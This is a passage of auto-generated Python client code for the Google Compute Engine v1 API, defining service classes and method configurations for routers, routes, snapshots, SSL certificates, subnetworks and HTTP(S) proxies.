config = self.GetMethodConfig('SetNamedPorts')
return self._RunMethod(
config, request, global_params=global_params)
SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroups.setNamedPorts',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/setNamedPorts',
request_field=u'regionInstanceGroupsSetNamedPortsRequest',
request_type_name=u'ComputeRegionInstanceGroupsSetNamedPortsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionOperationsService(base_api.BaseApiService):
"""Service class for the regionOperations resource."""
_NAME = u'regionOperations'
def __init__(self, client):
super(ComputeV1.RegionOperationsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified region-specific Operations resource.
Args:
request: (ComputeRegionOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeRegionOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionOperations.delete',
ordered_params=[u'project', u'region', u'operation'],
path_params=[u'operation', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
request_field='',
request_type_name=u'ComputeRegionOperationsDeleteRequest',
response_type_name=u'ComputeRegionOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified region-specific Operations resource.
Args:
request: (ComputeRegionOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionOperations.get',
ordered_params=[u'project', u'region', u'operation'],
path_params=[u'operation', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/operations/{operation}',
request_field='',
request_type_name=u'ComputeRegionOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified region.
Args:
request: (ComputeRegionOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionOperations.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/operations',
request_field='',
request_type_name=u'ComputeRegionOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class RegionsService(base_api.BaseApiService):
"""Service class for the regions resource."""
_NAME = u'regions'
def __init__(self, client):
super(ComputeV1.RegionsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified Region resource. Get a list of available regions by making a list() request.
Args:
request: (ComputeRegionsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Region) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regions.get',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}',
request_field='',
request_type_name=u'ComputeRegionsGetRequest',
response_type_name=u'Region',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of region resources available to the specified project.
Args:
request: (ComputeRegionsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regions.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions',
request_field='',
request_type_name=u'ComputeRegionsListRequest',
response_type_name=u'RegionList',
supports_download=False,
)
class RoutersService(base_api.BaseApiService):
"""Service class for the routers resource."""
_NAME = u'routers'
def __init__(self, client):
super(ComputeV1.RoutersService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of routers.
Args:
request: (ComputeRoutersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/routers',
request_field='',
request_type_name=u'ComputeRoutersAggregatedListRequest',
response_type_name=u'RouterAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Router resource.
Args:
request: (ComputeRoutersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.routers.delete',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field='',
request_type_name=u'ComputeRoutersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Router resource. Get a list of available routers by making a list() request.
Args:
request: (ComputeRoutersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Router) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.get',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field='',
request_type_name=u'ComputeRoutersGetRequest',
response_type_name=u'Router',
supports_download=False,
)
def GetRouterStatus(self, request, global_params=None):
"""Retrieves runtime information of the specified router.
Args:
request: (ComputeRoutersGetRouterStatusRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterStatusResponse) The response message.
"""
config = self.GetMethodConfig('GetRouterStatus')
return self._RunMethod(
config, request, global_params=global_params)
GetRouterStatus.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.getRouterStatus',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}/getRouterStatus',
request_field='',
request_type_name=u'ComputeRoutersGetRouterStatusRequest',
response_type_name=u'RouterStatusResponse',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Router resource in the specified project and region using the data included in the request.
Args:
request: (ComputeRoutersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers',
request_field=u'router',
request_type_name=u'ComputeRoutersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Router resources available to the specified project.
Args:
request: (ComputeRoutersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouterList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/routers',
request_field='',
request_type_name=u'ComputeRoutersListRequest',
response_type_name=u'RouterList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified Router resource with the data included in the request. This method supports PATCH semantics and uses JSON merge patch format and processing rules.
Args:
request: (ComputeRoutersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.routers.patch',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Preview(self, request, global_params=None):
"""Preview fields auto-generated during router create and update operations. Calling this method does NOT create or update the router.
Args:
request: (ComputeRoutersPreviewRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RoutersPreviewResponse) The response message.
"""
config = self.GetMethodConfig('Preview')
return self._RunMethod(
config, request, global_params=global_params)
Preview.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routers.preview',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}/preview',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersPreviewRequest',
response_type_name=u'RoutersPreviewResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified Router resource with the data included in the request.
Args:
request: (ComputeRoutersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.routers.update',
ordered_params=[u'project', u'region', u'router'],
path_params=[u'project', u'region', u'router'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/routers/{router}',
request_field=u'routerResource',
request_type_name=u'ComputeRoutersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RoutesService(base_api.BaseApiService):
"""Service class for the routes resource."""
_NAME = u'routes'
def __init__(self, client):
super(ComputeV1.RoutesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified Route resource.
Args:
request: (ComputeRoutesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.routes.delete',
ordered_params=[u'project', u'route'],
path_params=[u'project', u'route'],
query_params=[],
relative_path=u'projects/{project}/global/routes/{route}',
request_field='',
request_type_name=u'ComputeRoutesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Route resource. Get a list of available routes by making a list() request.
Args:
request: (ComputeRoutesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Route) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routes.get',
ordered_params=[u'project', u'route'],
path_params=[u'project', u'route'],
query_params=[],
relative_path=u'projects/{project}/global/routes/{route}',
request_field='',
request_type_name=u'ComputeRoutesGetRequest',
response_type_name=u'Route',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Route resource in the specified project using the data included in the request.
Args:
request: (ComputeRoutesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.routes.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/routes',
request_field=u'route',
request_type_name=u'ComputeRoutesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Route resources available to the specified project.
Args:
request: (ComputeRoutesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RouteList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.routes.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/routes',
request_field='',
request_type_name=u'ComputeRoutesListRequest',
response_type_name=u'RouteList',
supports_download=False,
)
class SnapshotsService(base_api.BaseApiService):
"""Service class for the snapshots resource."""
_NAME = u'snapshots'
def __init__(self, client):
super(ComputeV1.SnapshotsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified Snapshot resource. Keep in mind that deleting a single snapshot might not necessarily delete all the data on that snapshot. If any data on the snapshot that is marked for deletion is needed for subsequent snapshots, the data will be moved to the next corresponding snapshot.
For more information, see Deleting snaphots.
Args:
request: (ComputeSnapshotsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.snapshots.delete',
ordered_params=[u'project', u'snapshot'],
path_params=[u'project', u'snapshot'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{snapshot}',
request_field='',
request_type_name=u'ComputeSnapshotsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Snapshot resource. Get a list of available snapshots by making a list() request.
Args:
request: (ComputeSnapshotsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Snapshot) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.snapshots.get',
ordered_params=[u'project', u'snapshot'],
path_params=[u'project', u'snapshot'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{snapshot}',
request_field='',
request_type_name=u'ComputeSnapshotsGetRequest',
response_type_name=u'Snapshot',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of Snapshot resources contained within the specified project.
Args:
request: (ComputeSnapshotsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SnapshotList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.snapshots.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/snapshots',
request_field='',
request_type_name=u'ComputeSnapshotsListRequest',
response_type_name=u'SnapshotList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a snapshot. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeSnapshotsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.snapshots.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/snapshots/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeSnapshotsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class SslCertificatesService(base_api.BaseApiService):
"""Service class for the sslCertificates resource."""
_NAME = u'sslCertificates'
def __init__(self, client):
super(ComputeV1.SslCertificatesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified SslCertificate resource.
Args:
request: (ComputeSslCertificatesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.sslCertificates.delete',
ordered_params=[u'project', u'sslCertificate'],
path_params=[u'project', u'sslCertificate'],
query_params=[],
relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
request_field='',
request_type_name=u'ComputeSslCertificatesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified SslCertificate resource. Get a list of available SSL certificates by making a list() request.
Args:
request: (ComputeSslCertificatesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslCertificate) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslCertificates.get',
ordered_params=[u'project', u'sslCertificate'],
path_params=[u'project', u'sslCertificate'],
query_params=[],
relative_path=u'projects/{project}/global/sslCertificates/{sslCertificate}',
request_field='',
request_type_name=u'ComputeSslCertificatesGetRequest',
response_type_name=u'SslCertificate',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a SslCertificate resource in the specified project using the data included in the request.
Args:
request: (ComputeSslCertificatesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.sslCertificates.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/sslCertificates',
request_field=u'sslCertificate',
request_type_name=u'ComputeSslCertificatesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of SslCertificate resources available to the specified project.
Args:
request: (ComputeSslCertificatesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SslCertificateList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.sslCertificates.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/sslCertificates',
request_field='',
request_type_name=u'ComputeSslCertificatesListRequest',
response_type_name=u'SslCertificateList',
supports_download=False,
)
class SubnetworksService(base_api.BaseApiService):
"""Service class for the subnetworks resource."""
_NAME = u'subnetworks'
def __init__(self, client):
super(ComputeV1.SubnetworksService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of subnetworks.
Args:
request: (ComputeSubnetworksAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SubnetworkAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/subnetworks',
request_field='',
request_type_name=u'ComputeSubnetworksAggregatedListRequest',
response_type_name=u'SubnetworkAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified subnetwork.
Args:
request: (ComputeSubnetworksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.subnetworks.delete',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def ExpandIpCidrRange(self, request, global_params=None):
"""Expands the IP CIDR range of the subnetwork to a specified value.
Args:
request: (ComputeSubnetworksExpandIpCidrRangeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('ExpandIpCidrRange')
return self._RunMethod(
config, request, global_params=global_params)
ExpandIpCidrRange.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.expandIpCidrRange',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/expandIpCidrRange',
request_field=u'subnetworksExpandIpCidrRangeRequest',
request_type_name=u'ComputeSubnetworksExpandIpCidrRangeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified subnetwork. Get a list of available subnetworks list() request.
Args:
request: (ComputeSubnetworksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Subnetwork) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.get',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}',
request_field='',
request_type_name=u'ComputeSubnetworksGetRequest',
response_type_name=u'Subnetwork',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a subnetwork in the specified project using the data included in the request.
Args:
request: (ComputeSubnetworksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks',
request_field=u'subnetwork',
request_type_name=u'ComputeSubnetworksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of subnetworks available to the specified project.
Args:
request: (ComputeSubnetworksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SubnetworkList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.subnetworks.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/subnetworks',
request_field='',
request_type_name=u'ComputeSubnetworksListRequest',
response_type_name=u'SubnetworkList',
supports_download=False,
)
def SetPrivateIpGoogleAccess(self, request, global_params=None):
"""Set whether VMs in this subnet can access Google services without assigning external IP addresses through Private Google Access.
Args:
request: (ComputeSubnetworksSetPrivateIpGoogleAccessRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetPrivateIpGoogleAccess')
return self._RunMethod(
config, request, global_params=global_params)
SetPrivateIpGoogleAccess.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.subnetworks.setPrivateIpGoogleAccess',
ordered_params=[u'project', u'region', u'subnetwork'],
path_params=[u'project', u'region', u'subnetwork'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/subnetworks/{subnetwork}/setPrivateIpGoogleAccess',
request_field=u'subnetworksSetPrivateIpGoogleAccessRequest',
request_type_name=u'ComputeSubnetworksSetPrivateIpGoogleAccessRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetHttpProxiesService(base_api.BaseApiService):
"""Service class for the targetHttpProxies resource."""
_NAME = u'targetHttpProxies'
def __init__(self, client):
super(ComputeV1.TargetHttpProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetHttpProxy resource.
Args:
request: (ComputeTargetHttpProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetHttpProxies.delete',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetHttpProxy resource. Get a list of available target HTTP proxies by making a list() request.
Args:
request: (ComputeTargetHttpProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpProxies.get',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesGetRequest',
response_type_name=u'TargetHttpProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetHttpProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetHttpProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpProxies',
request_field=u'targetHttpProxy',
request_type_name=u'ComputeTargetHttpProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetHttpProxy resources available to the specified project.
Args:
request: (ComputeTargetHttpProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetHttpProxies',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesListRequest',
response_type_name=u'TargetHttpProxyList',
supports_download=False,
)
def SetUrlMap(self, request, global_params=None):
"""Changes the URL map for TargetHttpProxy.
Args:
request: (ComputeTargetHttpProxiesSetUrlMapRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUrlMap')
return self._RunMethod(
config, request, global_params=global_params)
SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpProxies.setUrlMap',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[],
relative_path=u'projects/{project}/targetHttpProxies/{targetHttpProxy}/setUrlMap',
request_field=u'urlMapReference',
request_type_name=u'ComputeTargetHttpProxiesSetUrlMapRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetHttpsProxiesService(base_api.BaseApiService):
"""Service class for the targetHttpsProxies resource."""
_NAME = u'targetHttpsProxies'
def __init__(self, client):
super(ComputeV1.TargetHttpsProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetHttpsProxy resource.
Args:
request: (ComputeTargetHttpsProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetHttpsProxies.delete',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesDeleteRequest',
